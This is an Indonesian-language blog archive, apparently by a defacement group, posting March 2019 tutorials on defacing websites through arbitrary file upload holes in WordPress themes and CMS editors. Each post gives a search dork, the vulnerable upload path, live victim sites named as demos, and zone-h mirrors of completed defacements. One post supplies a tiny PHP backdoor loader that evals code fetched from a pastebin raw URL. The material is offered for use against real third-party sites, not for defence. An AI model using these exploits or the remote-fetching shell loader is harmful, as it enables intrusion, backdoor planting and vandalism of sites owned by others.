Postingan

Menampilkan postingan dari Maret, 2019

Deface WordPress Themes Qualifier

Gambar
Yo Kali Ini Gue Mau Kasih Tutorial Deface WordPress Themes Qualifier File Upload Yo Langsung Aja Kentod

Dork : inurl:"/wp-content/themes/qualifire"
(Kembangin Lagi Gaun 😂)

Exploit : /wp-content/themes/qualifire/scripts/admin/uploadify/uploadify.php

Csrf Onlinenya -> Klik Jancok

Live : http://www.depal.it

Dorking Dolo Digoogle Pilih Salah Satu Web/Target (+) Exploitnya Diatas

Vuln? = Blank

Disini Gue Pake Live Target Yang Diatas

Langsung Aja Buka Csrfnya
Post File : Filedata
Abis Itu Kalian Upload Deh File Kalian

Jika Berhasil Kek Gambar Dibawah Ini

Akan Muncul Angka 1
Location File? http://target.lu/file lu
Example : http://www.depal.it/69.txt
Mirror : http://www.zone-h.org/mirror/id/32300014

Thanks To All Member Ghost Riddiculous Team

Deface 雅风工作室 - Arbitrary File Upload

Gambar
Yo Kali Ini Gue Mao Kasih Tutorial Deface 雅风工作室 - Arbitrary File Upload. Langsung Aja Ajg

Dork : intext:"Htmcss.Com All Rights Reserved"

Exploit : /tpl/plugins/upload9.1.0/server/php/

Live : http://jmxzw.com

Disini W Pakai Web Yang Diatas

Ciri-ciri Web Vuln Kaya Gambar Dibawah Ini

Nah Langsung Aja Buka Csrf Onlinenya Klik Disini
Post File : files[]
Kalo Udah Klik Kunci Target Tinggal Upload Deh Shell/SC Kalian

Ciri-ciri Kalo Berhasil Seperti Gambar Dibawah Ini

Cara Manggil Filenya? http:\/\/target.lu\/tpl\/plugins\/upload9.1.0\/server\/php\/files\/\/[random angka_.php"

Kalo Berhasil Seterah Lo Mau Ngapain Kek :'voos

Example : http://jmxzw.com/tmp
Mirror : http://www.zone-
h.org/mirror/id/32276848


Tadaaaaaa :'v Sekian Gue CAPE NGETIK AJG :'voos

Thanks To All Member Ghost Riddiculous Team

Deface Radiosnet Upload

Gambar
*Deface Dengan Cara Radiosnet Upload Vulnerability*

Dork : inurl:"subir_foto.php"

Exploit : /subir_foto.php

Allowed Type : jpg,png,gif

Vuln?Ada Tempat Upload Kek Gini
Location File? Tinggal Tekan Gambar Lu Abis Itu Klik New Tab

Demo : http://radiodenoticias.com.ar/subir_foto.php

Example : http://radiodenoticias.com.ar/upload_pic/resize_1552110139.jpg

Thanks To All Member Ghost Riddiculous Team

Cara Memperkecil Ukuran Shell Backdoor

Gambar
Yo Sekarang Gue Mau Kasih Tau Cara Memperkecil Ukuran Shell Backdoor

Buat Script Seperti Ini
<?php eval("?>".file_get_contents("Link Pastebin Kalian"));?>

Simpan Script Php/Shell Backdoor Kalian Dipastebin

Nah Kalo Sudah Disimpan Tambahkan /raw/ dibelakang Pastebin
Example : https://pastebin.com/raw/q3qW3EVy

Lalu Masukkan Link Pastebin Kalian Di Script Yang Diatas Tadi

Example : <?php eval("?>".file_get_contents("https://pastebin.com/raw/q3qW3EVy"));?>

Lalu Simpan Deh Script Kalian :')
Ukuran Filenya Kurang Dari 1Kb Sangat Kecil Bukan?:'v

Semoga Bermanfaat :')

Deface Asset Manager

Gambar
Deface Dengan Cara Asset Manager :'(

Dork : /editor/assetmanager/

Exploit : /Editor/assetmanager/assetmanager.php

Allowed Type : jpg,png,gif,txt

Location File?:v Tinggal Klik Aja File Lo


Demo : http://www.ciudadesygenero.org/Editor/assetmanager/assetmanager.php

Example : http://www.ciudadesygenero.org/Editor/archivos/grt.jpg

Deface WordPress DailyDeal Themes

Gambar
*Deface WordPress DailyDeal Themes*
Dork : inurl:wp-content/themes/DailyDeal/

Exploit : /wp-content/themes/DailyDeal/monetize/upload/

Vuln?Ada Tempat Upload Kek Gambar Dibawah Ini 



Location File : 

http://site-target/wp-content/uploads/[years]/[months]/[CariFileLo].php/html

Demo : http://www.bigdailydeals.co.uk/wp-content/themes/DailyDeal/monetize/upload/

Example: http://www.bigdailydeals.co.uk/wp-content/uploads/2019/06/1560866000985041455.html

Deface Raw Marketing Bypass Uploader

Gambar
*Deface Raw Marketing Bypass Uploader*

Dork : intext:" Website by Raw Marketing"

Exploit : /editor/assetmanager/assetmanager.php

Location File? Tinggal Klik Aja File Kalian

Demo : http://www.kathmanducuisine.com.au/editor/assetmanager/assetmanager.php
Example : http://www.kathmanducuisine.com.au/editor/assets/alqi.txt

Thanks To All Member Ghost Riddiculous Team